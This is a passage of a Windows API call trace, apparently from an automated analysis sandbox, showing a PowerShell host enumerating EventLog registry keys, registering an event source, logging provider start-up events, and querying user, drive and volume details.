	[0598.449] CoTaskMemAlloc (cb=0x204) returned 0x368dd0
	[0598.449] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x6, lpName=0x368dd0, lpcchName=0x22d168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x22d168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0598.449] CoTaskMemFree (pv=0x368dd0) 
	[0598.449] CoTaskMemFree (pv=0x0) 
	[0598.449] CoTaskMemAlloc (cb=0x204) returned 0x368dd0
	[0598.449] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x7, lpName=0x368dd0, lpcchName=0x22d168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x22d168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0598.449] CoTaskMemFree (pv=0x368dd0) 
	[0598.449] CoTaskMemFree (pv=0x0) 
	[0598.449] CoTaskMemAlloc (cb=0x204) returned 0x368dd0
	[0598.449] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x8, lpName=0x368dd0, lpcchName=0x22d168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x22d168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0598.450] CoTaskMemFree (pv=0x368dd0) 
	[0598.450] CoTaskMemFree (pv=0x0) 
	[0598.450] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d1c8 | out: phkResult=0x22d1c8*=0x33c) returned 0x0
	[0598.450] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d1c8 | out: phkResult=0x22d1c8*=0x0) returned 0x2
	[0598.450] RegOpenKeyExW (in: hKey=0x360, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d1c8 | out: phkResult=0x22d1c8*=0x364) returned 0x0
	[0598.450] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d1c8 | out: phkResult=0x22d1c8*=0x0) returned 0x2
	[0599.772] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d1c8 | out: phkResult=0x22d1c8*=0x368) returned 0x0
	[0599.772] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d1c8 | out: phkResult=0x22d1c8*=0x0) returned 0x2
	[0599.772] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d1c8 | out: phkResult=0x22d1c8*=0x36c) returned 0x0
	[0599.772] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d1c8 | out: phkResult=0x22d1c8*=0x0) returned 0x2
	[0599.773] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d1c8 | out: phkResult=0x22d1c8*=0x370) returned 0x0
	[0599.773] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d1c8 | out: phkResult=0x22d1c8*=0x0) returned 0x2
	[0599.773] RegOpenKeyExW (in: hKey=0x360, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d1c8 | out: phkResult=0x22d1c8*=0x374) returned 0x0
	[0599.773] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d1c8 | out: phkResult=0x22d1c8*=0x0) returned 0x2
	[0599.773] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d1c8 | out: phkResult=0x22d1c8*=0x378) returned 0x0
	[0599.773] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d1c8 | out: phkResult=0x22d1c8*=0x0) returned 0x2
	[0599.773] RegOpenKeyExW (in: hKey=0x360, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d1c8 | out: phkResult=0x22d1c8*=0x37c) returned 0x0
	[0599.773] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d1c8 | out: phkResult=0x22d1c8*=0x0) returned 0x2
	[0599.773] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d1c8 | out: phkResult=0x22d1c8*=0x380) returned 0x0
	[0599.774] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d1c8 | out: phkResult=0x22d1c8*=0x384) returned 0x0
	[0599.774] RegCloseKey (hKey=0x384) returned 0x0
	[0599.774] RegCloseKey (hKey=0x360) returned 0x0
	[0599.774] RegCloseKey (hKey=0x380) returned 0x0
	[0599.778] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d138 | out: phkResult=0x22d138*=0x380) returned 0x0
	[0599.778] RegQueryInfoKeyW (in: hKey=0x380, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x22d0ac, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x22d0a8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x22d0ac*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x22d0a8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0599.778] CoTaskMemFree (pv=0x0) 
	[0599.778] CoTaskMemAlloc (cb=0x204) returned 0x368dd0
	[0599.778] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x0, lpName=0x368dd0, lpcchName=0x22d138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x22d138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0599.779] CoTaskMemFree (pv=0x368dd0) 
	[0599.779] CoTaskMemFree (pv=0x0) 
	[0599.779] CoTaskMemAlloc (cb=0x204) returned 0x368dd0
	[0599.779] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x1, lpName=0x368dd0, lpcchName=0x22d138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x22d138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0599.779] CoTaskMemFree (pv=0x368dd0) 
	[0599.779] CoTaskMemFree (pv=0x0) 
	[0599.779] CoTaskMemAlloc (cb=0x204) returned 0x368dd0
	[0599.779] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x2, lpName=0x368dd0, lpcchName=0x22d138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x22d138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0599.779] CoTaskMemFree (pv=0x368dd0) 
	[0599.779] CoTaskMemFree (pv=0x0) 
	[0599.779] CoTaskMemAlloc (cb=0x204) returned 0x368dd0
	[0599.779] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x3, lpName=0x368dd0, lpcchName=0x22d138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x22d138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0599.779] CoTaskMemFree (pv=0x368dd0) 
	[0599.779] CoTaskMemFree (pv=0x0) 
	[0599.779] CoTaskMemAlloc (cb=0x204) returned 0x368dd0
	[0599.780] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x4, lpName=0x368dd0, lpcchName=0x22d138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x22d138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0599.780] CoTaskMemFree (pv=0x368dd0) 
	[0599.780] CoTaskMemFree (pv=0x0) 
	[0599.780] CoTaskMemAlloc (cb=0x204) returned 0x368dd0
	[0599.780] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x5, lpName=0x368dd0, lpcchName=0x22d138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x22d138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0599.780] CoTaskMemFree (pv=0x368dd0) 
	[0599.780] CoTaskMemFree (pv=0x0) 
	[0599.780] CoTaskMemAlloc (cb=0x204) returned 0x368dd0
	[0599.780] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x6, lpName=0x368dd0, lpcchName=0x22d138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x22d138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0599.780] CoTaskMemFree (pv=0x368dd0) 
	[0599.780] CoTaskMemFree (pv=0x0) 
	[0599.780] CoTaskMemAlloc (cb=0x204) returned 0x368dd0
	[0599.780] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x7, lpName=0x368dd0, lpcchName=0x22d138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x22d138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0599.780] CoTaskMemFree (pv=0x368dd0) 
	[0599.780] CoTaskMemFree (pv=0x0) 
	[0599.781] CoTaskMemAlloc (cb=0x204) returned 0x368dd0
	[0599.781] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x8, lpName=0x368dd0, lpcchName=0x22d138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x22d138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0599.781] CoTaskMemFree (pv=0x368dd0) 
	[0599.781] CoTaskMemFree (pv=0x0) 
	[0599.781] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d198 | out: phkResult=0x22d198*=0x360) returned 0x0
	[0599.781] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d198 | out: phkResult=0x22d198*=0x0) returned 0x2
	[0599.781] RegOpenKeyExW (in: hKey=0x380, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d198 | out: phkResult=0x22d198*=0x384) returned 0x0
	[0599.781] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d198 | out: phkResult=0x22d198*=0x0) returned 0x2
	[0599.781] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d198 | out: phkResult=0x22d198*=0x388) returned 0x0
	[0599.781] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d198 | out: phkResult=0x22d198*=0x0) returned 0x2
	[0599.782] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d198 | out: phkResult=0x22d198*=0x38c) returned 0x0
	[0599.782] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d198 | out: phkResult=0x22d198*=0x0) returned 0x2
	[0599.782] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d198 | out: phkResult=0x22d198*=0x390) returned 0x0
	[0599.782] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d198 | out: phkResult=0x22d198*=0x0) returned 0x2
	[0599.782] RegOpenKeyExW (in: hKey=0x380, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d198 | out: phkResult=0x22d198*=0x394) returned 0x0
	[0599.782] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d198 | out: phkResult=0x22d198*=0x0) returned 0x2
	[0599.782] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d198 | out: phkResult=0x22d198*=0x398) returned 0x0
	[0599.782] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d198 | out: phkResult=0x22d198*=0x0) returned 0x2
	[0599.782] RegOpenKeyExW (in: hKey=0x380, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d198 | out: phkResult=0x22d198*=0x39c) returned 0x0
	[0599.783] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d198 | out: phkResult=0x22d198*=0x0) returned 0x2
	[0599.783] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d198 | out: phkResult=0x22d198*=0x3a0) returned 0x0
	[0599.783] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d198 | out: phkResult=0x22d198*=0x3a4) returned 0x0
	[0599.783] RegCloseKey (hKey=0x3a4) returned 0x0
	[0599.783] RegCloseKey (hKey=0x380) returned 0x0
	[0599.784] RegCloseKey (hKey=0x3a0) returned 0x0
	[0599.789] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b8c0008
	[0601.375] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x325a2e8*="WSMan", lpRawData=0x325a058) returned 1
	[0601.376] CoTaskMemAlloc (cb=0x104) returned 0x38e630
	[0601.376] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0601.376] CoTaskMemFree (pv=0x38e630) 
	[0601.378] CoTaskMemAlloc (cb=0x804) returned 0x34dfb0
	[0601.378] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x34dfb0, nSize=0x22d428 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x22d428) returned 0x1
	[0601.378] CoTaskMemFree (pv=0x34dfb0) 
	[0601.378] CoTaskMemAlloc (cb=0x204) returned 0x368dd0
	[0601.378] GetUserNameW (in: lpBuffer=0x368dd0, pcbBuffer=0x22d468 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x22d468) returned 1
	[0601.379] CoTaskMemFree (pv=0x368dd0) 
	[0601.379] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x325f820*="Alias", lpRawData=0x325f5b0) returned 1
	[0601.380] CoTaskMemAlloc (cb=0x104) returned 0x38e630
	[0601.380] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0601.380] CoTaskMemFree (pv=0x38e630) 
	[0601.381] CoTaskMemAlloc (cb=0x804) returned 0x34dfb0
	[0601.381] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x34dfb0, nSize=0x22d428 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x22d428) returned 0x1
	[0601.382] CoTaskMemFree (pv=0x34dfb0) 
	[0601.382] CoTaskMemAlloc (cb=0x204) returned 0x368dd0
	[0601.382] GetUserNameW (in: lpBuffer=0x368dd0, pcbBuffer=0x22d468 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x22d468) returned 1
	[0601.382] CoTaskMemFree (pv=0x368dd0) 
	[0601.382] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3264e18*="Environment", lpRawData=0x3264ba8) returned 1
	[0601.384] CoTaskMemAlloc (cb=0x104) returned 0x38e630
	[0601.384] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0601.384] CoTaskMemFree (pv=0x38e630) 
	[0601.384] CoTaskMemAlloc (cb=0x104) returned 0x38e630
	[0601.384] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x38e630, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0601.385] CoTaskMemFree (pv=0x38e630) 
	[0601.385] CoTaskMemAlloc (cb=0x104) returned 0x38e630
	[0601.385] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x38e630, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0601.385] CoTaskMemFree (pv=0x38e630) 
	[0601.385] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x22cfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0601.385] SetErrorMode (uMode=0x1) returned 0x1
	[0601.385] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x22d1e0 | out: lpFileInformation=0x22d1e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0601.385] SetErrorMode (uMode=0x1) returned 0x1
	[0601.387] GetLogicalDrives () returned 0x4
	[0601.387] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x22cd40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0601.388] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0601.389] SetErrorMode (uMode=0x1) returned 0x1
	[0601.390] CoTaskMemAlloc (cb=0x68) returned 0x3cdd40
	[0601.390] CoTaskMemAlloc (cb=0x68) returned 0x3cdcd0
	[0601.390] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x3cdd40, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x22d1b0, lpMaximumComponentLength=0x22d1ac, lpFileSystemFlags=0x22d1a8, lpFileSystemNameBuffer=0x3cdcd0, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22d1b0*=0x9c354b42, lpMaximumComponentLength=0x22d1ac*=0xff, lpFileSystemFlags=0x22d1a8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0601.390] CoTaskMemFree (pv=0x3cdd40) 
	[0601.390] CoTaskMemFree (pv=0x3cdcd0) 
	[0601.390] SetErrorMode (uMode=0x1) returned 0x1
	[0601.390] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0601.391] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x22cef0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0601.391] SetErrorMode (uMode=0x1) returned 0x1
	[0601.391] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x22d150 | out: lpFileInformation=0x22d150*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0601.391] SetErrorMode (uMode=0x1) returned 0x1
	[0601.391] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x22cef0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0601.391] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x22cda0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0601.391] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0601.392] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x22ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0601.392] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0601.392] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x22cd20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0601.392] SetErrorMode (uMode=0x1) returned 0x1
	[0601.392] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x22cf80 | out: lpFileInformation=0x22cf80*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0601.393] SetErrorMode (uMode=0x1) returned 0x1
	[0601.393] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x22cd20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0601.393] SetErrorMode (uMode=0x1) returned 0x1
	[0601.393] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x22cf80 | out: lpFileInformation=0x22cf80*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0601.393] SetErrorMode (uMode=0x1) returned 0x1
	[0601.393] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x22cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0601.393] SetErrorMode (uMode=0x1) returned 0x1
	[0601.393] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x22d020 | out: lpFileInformation=0x22d020*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0601.394] SetErrorMode (uMode=0x1) returned 0x1
	[0601.394] CoTaskMemAlloc (cb=0x804) returned 0x34dfb0
	[0601.394] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x34dfb0, nSize=0x22d428 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x22d428) returned 0x1
	[0601.395] CoTaskMemFree (pv=0x34dfb0) 
	[0601.395] CoTaskMemAlloc (cb=0x204) returned 0x368dd0
	[0601.395] GetUserNameW (in: lpBuffer=0x368dd0, pcbBuffer=0x22d468 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x22d468) returned 1
	[0601.395] CoTaskMemFree (pv=0x368dd0) 
	[0601.395] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x326bf08*="FileSystem", lpRawData=0x326bc98) returned 1
	[0601.396] CoTaskMemAlloc (cb=0x104) returned 0x38e630
	[0601.397] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0601.397] CoTaskMemFree (pv=0x38e630) 
	[0601.398] CoTaskMemAlloc (cb=0x804) returned 0x34dfb0
	[0601.398] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x34dfb0, nSize=0x22d428 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x22d428) returned 0x1
	[0601.398] CoTaskMemFree (pv=0x34dfb0) 
	[0601.398] CoTaskMemAlloc (cb=0x204) returned 0x368dd0
	[0601.398] GetUserNameW (in: lpBuffer=0x368dd0, pcbBuffer=0x22d468 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x22d468) returned 1
	[0601.399] CoTaskMemFree (pv=0x368dd0) 
	[0601.399] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3271748*="Function", lpRawData=0x32714d8) returned 1
	[0601.400] CoTaskMemAlloc (cb=0x104) returned 0x38e630
	[0601.400] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x38e630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0601.400] CoTaskMemFree (pv=0x38e630) 
	[0602.871] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0602.871] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22cc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0602.872] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22cc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0602.874] CoTaskMemAlloc (cb=0x804) returned 0x34dfb0
	[0602.874] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x34dfb0, nSize=0x22d428 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x22d428) returned 0x1
	[0603.968] CoTaskMemFree (pv=0x34dfb0) 
	[0603.968] CoTaskMemAlloc (cb=0x204) returned 0x368dd0
	[0603.968] GetUserNameW (in: lpBuffer=0x368dd0, pcbBuffer=0x22d468 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x22d468) returned 1
	[0603.968] CoTaskMemFree (pv=0x368dd0) 
